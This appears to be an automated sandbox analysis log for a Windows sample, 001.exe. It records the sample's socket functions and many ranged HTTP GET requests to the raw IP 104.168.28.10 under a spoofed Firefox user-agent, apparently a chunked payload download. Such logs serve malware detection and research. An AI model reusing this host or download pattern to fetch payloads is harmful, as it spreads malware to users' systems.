Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008692C4 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,__swprintf_l,send,recv,closesocket,closesocket,closesocket,closesocket | 1_2_008692C4
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=0-16383 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=32768-49151 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=65536-81919 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=49152-65535 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=114688-131071 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=16384-32767 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=98304-114687 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=81920-98303 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=131072-139263 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=139264-147455 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=147456-155647 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=155648-172031 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=172032-188415 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=188416-204799 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=204800-237567 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=188416-204799 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=172032-188415 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=237568-303103 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=172032-188415 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=188416-204799 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=303104-434175 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=434176-442367 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=442368-450559 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=450560-458751 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=458752-475135 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=475136-491519 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=491520-524287 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=524288-557055 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=557056-573439 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=573440-638975 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=638976-655359 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=655360-720895 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=720896-753663 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=753664-786431 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=655360-720895 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=786432-917503 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=917504-933887 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=933888-966655 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=966656-1032191 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1032192-1048575 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1048576-1114111 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1114112-1122303 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1122304-1130495 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1114112-1122303 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=13116-16383 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=127798-131071 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=62264-65535 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1130496-1163263 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1163264-1196031 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1196032-1212415 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1212416-1245183 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=13116-16383 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1245184-1249279 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1249280-1314815 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1314816-1380351 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1380352-1388543 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1388544-1396735 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1396736-1429503 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1429504-1560575 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1560576-1691647 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1691648-1708031 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1708032-1740799 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1740800-1757183 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1757184-1773567 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1773568-1806335 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1806336-1871871 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1871872-1888255 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1888256-1921023 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1921024-1937407 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1937408-2002943 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1871872-1888255 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2002944-2035711 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2035712-2166783 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2166784-2297855 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2297856-2330623 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2330624-2363391 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2363392-2428927 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2428928-2445311 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2445312-2453503 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2453504-2486271 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2486272-2551807 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2551808-2617343 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2617344-2633727 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2633728-2637823 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2637824-2670591 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2670592-2703359 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2703360-2719743 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2719744-2727935 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2727936-2760703 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2760704-2826239 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2826240-2842623 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2842624-2875391 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2875392-2891775 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2891776-2924543 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2924544-2940927 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2940928-3006463 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2940928-3006463 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3006464-3022847 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3022848-3055615 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3055616-3088383 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3088384-3096575 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3096576-3112959 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3112960-3121151 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3121152-3137535 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3137536-3153919 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3153920-3170303 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3170304-3174399 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3174400-3207167 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3207168-3215359 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3170304-3174399 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3215360-3231743 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3231744-3239935 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3239936-3248127 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
